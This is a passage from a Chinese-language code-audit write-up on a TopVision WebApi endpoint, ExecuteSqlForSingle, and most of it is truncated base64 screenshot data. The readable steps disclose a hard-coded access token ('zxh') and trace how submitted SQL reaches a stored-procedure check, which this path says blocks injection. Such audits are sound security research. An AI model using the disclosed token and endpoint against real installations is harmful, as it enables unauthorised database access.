z8p6v4zmph0oz6pGwEtwYlm658hKbUEmx44TtY5tnU/f67OHNlqo8BgAwsW5KKgb+wPZOIiKafwWZb5k5ONiEpaV740hp1d3cjI2MRHntssaryN2/exEcfXcCSJTFdpVsVvid75ores/kGtuz5DvDuDhy+X1YCyijFj6pM+N2Ow7hfbomIiKbX0NDnQdtyc3NUHRvTFs2EhATcuHEdN25cV33M/PnRT3iJ5H2M079fjarVpcj4+P54P/g3nv4m8PtaJplERDQjxDTRfOghrePfiKbWjd/+J36/pApVWz7DjlnerPmNLXvwndTfo/bw/ZAyExHR/UB3YzSJAt3Ab3+2A7+d7jCi4OPDO9iSSUREM4pvjGZvb/d0x0JEREREM0x6evC75tSO0ZzS5Y2IiIiISD+YaBIRERFRTMzqMZoZcxcjIT4xYJtz9BNM3BtF/JwFsCz4esC+8YnbuHGnYypDJCIiItKtGZtoZmZmoru7O2SZtSu+h6yHlwRse/N//zs6Rz6GZcHXUflf/zVgX1fvX/DG7/+faIdKRERERDJmZNd5ZmYm3nzzjekOY1bJK3gfe0oq8HCUy85003kvkV07C8+UvI89BcWK57mfng8REenbjGvRzMzMxKFDv4TRaJzuUAI8bHsd1Taz4v7+9mr8vL0rqtfMK3gfz1tb8c47u9EWtDcLz5Tsw+qR/4kdF3qQprq6sjSUnRzF+BdW4Icl64GgOhPf07
<p blockindex=15>4、先看第一个接口TopVision.WebApi.Areas.Api.Controllers.systemController.ExecuteSqlForSingle</p>
<p blockindex=16><img src=data:image/png;base64,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
<p blockindex=17>5、请求方式为post,入参token、sql、strParameters。第一步if (base.IsAuthorityCheck() \== null)会先校验token，跟进IsAuthorityCheck方法查看，发现token硬编码为zxh：</p>
<p blockindex=18><img src="data:image/png;base64,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
<p blockindex=19>6、回到ExecuteSqlForSingle方法，三个入参最终会走到SingleBase&lt;systemService&gt;.Instance.ExecuteSqlForSingle中，跟进看代码：</p>
<p blockindex=20><img src="data:image/png;base64,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
<p blockindex=21>7、sql和strParameters会先走到GetExecuteSqlForStoreProcedure方法，跟进后，发现此方法必须要求sql字符以usp_、Usp_、USP_开头，或者值为SCM_SE_GetSystemSalesTips，此处不符合注入条件：</p>
<p blockindex=22><img src="data:image/png;base64,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